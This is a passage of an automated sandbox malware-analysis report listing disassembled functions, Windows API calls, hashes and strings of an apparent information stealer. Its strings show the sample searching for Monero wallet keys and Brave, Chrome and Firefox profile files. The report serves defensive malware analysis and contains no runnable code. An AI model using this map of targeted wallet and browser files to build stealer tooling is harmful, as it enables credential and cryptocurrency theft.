                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 75d982521c8e552f924b96fd98020199defdd6d64530a40bc08b0e980fa511d2
                  • Instruction ID: 445a0b3acbdeffd9580236a4773398550f1a12b122f08044ad821293588398fe
                  • Opcode Fuzzy Hash: 75d982521c8e552f924b96fd98020199defdd6d64530a40bc08b0e980fa511d2
                  • Instruction Fuzzy Hash: A8E0E674945348FFE750ABA09C4AB097A7CAB05B01F104154F7097B1D0DAB53A409699
                  Function 009A10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009A10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009A10F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: c5efa234a4879ed3b70f69f69710f0d12a19d20bc1d8778a8a6cbcd488348102
                  • Instruction ID: ca92be23afa76cd86921ab9320ca1223eacd10eaa771c69e3615377494d240d3
                  • Opcode Fuzzy Hash: c5efa234a4879ed3b70f69f69710f0d12a19d20bc1d8778a8a6cbcd488348102
                  • Instruction Fuzzy Hash: 22F0E271641218BBEB149AA4AC99FABB7ECE705B15F300848F504E7280D971AE00CAA0
                  Function 009A1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7910
                    • Part of subcall function 009B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009B7917
                    • Part of subcall function 009B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009B792F
                    • Part of subcall function 009B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009A11B7), ref: 009B7880
                    • Part of subcall function 009B7850: RtlAllocateHeap.NTDLL(00000000), ref: 009B7887
                    • Part of subcall function 009B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009B789F
                  • ExitProcess.KERNEL32 ref: 009A11C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: d7e60fb8fa6f20c7f0d61e9bc430a0fabbabc737935c3bb88384fb83e0569bd6
                  • Instruction ID: 35995eb6e7653653b944b86f1eb5723c6f58f9e1bd4e0bdb4c2a16454a0bae9b
                  • Opcode Fuzzy Hash: d7e60fb8fa6f20c7f0d61e9bc430a0fabbabc737935c3bb88384fb83e0569bd6
                  • Instruction Fuzzy Hash: F3E012B591430157CA0073F0AD8BB6B369C5B95395F040524FA09D7102FE25F801C5A6

                  Non-executed Functions

                  Function 009B38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 009B38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B38E3
                  • lstrcat.KERNEL32(?,?), ref: 009B3935
                  • StrCmpCA.SHLWAPI(?,009C0F70), ref: 009B3947
                  • StrCmpCA.SHLWAPI(?,009C0F74), ref: 009B395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B3C67
                  • FindClose.KERNEL32(000000FF), ref: 009B3C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: ec4aeba9a37e171705a9923dd4519fdf5f41137b6874b919ba78b64ce6b7e5c1
                  • Instruction ID: e719a2ff22b1b35e920b04fa9060a2edda717ae926405e67a2d2fee376e457c6
                  • Opcode Fuzzy Hash: ec4aeba9a37e171705a9923dd4519fdf5f41137b6874b919ba78b64ce6b7e5c1
                  • Instruction Fuzzy Hash: BFA131B1A00258ABDB24DFA4DD85FEE777CBB89300F048588B54D97141EB75AB84CF62
                  Function 009ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,009C0B32,009C0B2B,00000000,?,?,?,009C13F4,009C0B2A), ref: 009ABEF5
                  • StrCmpCA.SHLWAPI(?,009C13F8), ref: 009ABF4D
                  • StrCmpCA.SHLWAPI(?,009C13FC), ref: 009ABF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AC7BF
                  • FindClose.KERNEL32(000000FF), ref: 009AC7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 9f2cc3c5454a121e8a6d02ad2a69058aecb1fca292b6357af731e28c494dabd0
                  • Instruction ID: 4d4003f91d6523ca0394b074e43bd95da2ef886552d9de8d91519d7c570a2c81
                  • Opcode Fuzzy Hash: 9f2cc3c5454a121e8a6d02ad2a69058aecb1fca292b6357af731e28c494dabd0
                  • Instruction Fuzzy Hash: 53425172900108ABDB14FB70DE96FED737DAFD4310F404558B90AA7191EE34AB49CBA6
                  Function 009B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 009B492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B4943
                  • StrCmpCA.SHLWAPI(?,009C0FDC), ref: 009B4971
                  • StrCmpCA.SHLWAPI(?,009C0FE0), ref: 009B4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B4B7D
                  • FindClose.KERNEL32(000000FF), ref: 009B4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 5f70d62fb2296c192c97f2393b82dd16f06579f312725ebabf4e191dca7c0d24
                  • Instruction ID: eb993848b532dbec467d967133742572d8731770505d810923e8a1df5c60f76d
                  • Opcode Fuzzy Hash: 5f70d62fb2296c192c97f2393b82dd16f06579f312725ebabf4e191dca7c0d24
                  • Instruction Fuzzy Hash: 5E6135B5900218ABCB24EFA0DD85FEA77BCBB88701F04458CB60996141EF75EB85CF91
                  Function 009B4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009B4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B4587
                  • wsprintfA.USER32 ref: 009B45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B45BD
                  • StrCmpCA.SHLWAPI(?,009C0FC4), ref: 009B45EB
                  • StrCmpCA.SHLWAPI(?,009C0FC8), ref: 009B4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B468B
                  • FindClose.KERNEL32(000000FF), ref: 009B46A0
                  • lstrcat.KERNEL32(?,015EF678), ref: 009B46C5
                  • lstrcat.KERNEL32(?,015EE3C8), ref: 009B46D8
                  • lstrlen.KERNEL32(?), ref: 009B46E5
                  • lstrlen.KERNEL32(?), ref: 009B46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: f79e7ff0839e569b5b5341b2d12c6a7e1aed7ae3564ebbc32522584a8fa7a377
                  • Instruction ID: 52aaa3144b8f6cbe13a7ed586b6b19b9c50faf37488f28eb3457886024eeb0af
                  • Opcode Fuzzy Hash: f79e7ff0839e569b5b5341b2d12c6a7e1aed7ae3564ebbc32522584a8fa7a377
                  • Instruction Fuzzy Hash: 065145B5900218ABCB24EB70DDC9FED777CAB98710F404588B60997191EF74AB84CF92
                  Function 009B3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 009B3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B3EDA
                  • StrCmpCA.SHLWAPI(?,009C0FAC), ref: 009B3F08
                  • StrCmpCA.SHLWAPI(?,009C0FB0), ref: 009B3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B406C
                  • FindClose.KERNEL32(000000FF), ref: 009B4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 01c74a1bc4929f8e3f9baf39aadd99d26319026217bf5401817c1d4ec35faac9
                  • Instruction ID: 41cef1315376683bd6b3300f6414a0a243f6eed297acad1b1b88660a10084960
                  • Opcode Fuzzy Hash: 01c74a1bc4929f8e3f9baf39aadd99d26319026217bf5401817c1d4ec35faac9
                  • Instruction Fuzzy Hash: 235143B6900218ABCB24EBB0DD85FEA737CBB98300F40458CB65996140DF75EB85CF91
                  Function 009AED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 009AED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 009AED55
                  • StrCmpCA.SHLWAPI(?,009C1538), ref: 009AEDAB
                  • StrCmpCA.SHLWAPI(?,009C153C), ref: 009AEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AF2AE
                  • FindClose.KERNEL32(000000FF), ref: 009AF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: b69fd6c463ed8ae623f9697b743be0baf87b5be7dc5b19aa990c9d03a68b8ffb
                  • Instruction ID: 12c9f9693f81b495fa0edde4a27bd82fb058af56bd88d1ee517a0a8ed5172320
                  • Opcode Fuzzy Hash: b69fd6c463ed8ae623f9697b743be0baf87b5be7dc5b19aa990c9d03a68b8ffb
                  • Instruction Fuzzy Hash: 6DE1E7719111186AEB64FB60CD91FEE733CAF94710F4041D9B50A62492EF306F8ACF96
                  Function 009AF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009C15B8,009C0D96), ref: 009AF71E
                  • StrCmpCA.SHLWAPI(?,009C15BC), ref: 009AF76F
                  • StrCmpCA.SHLWAPI(?,009C15C0), ref: 009AF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AFAB1
                  • FindClose.KERNEL32(000000FF), ref: 009AFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 709f43b8146e04dab5d7e17e2cf5a087b004603c73826d677a00c3aef6a0dd88
                  • Instruction ID: fbb6234243a483e372cb48bc4c24f1a8e982cd0de3d25cc2e23c04918fa9ad68
                  • Opcode Fuzzy Hash: 709f43b8146e04dab5d7e17e2cf5a087b004603c73826d677a00c3aef6a0dd88
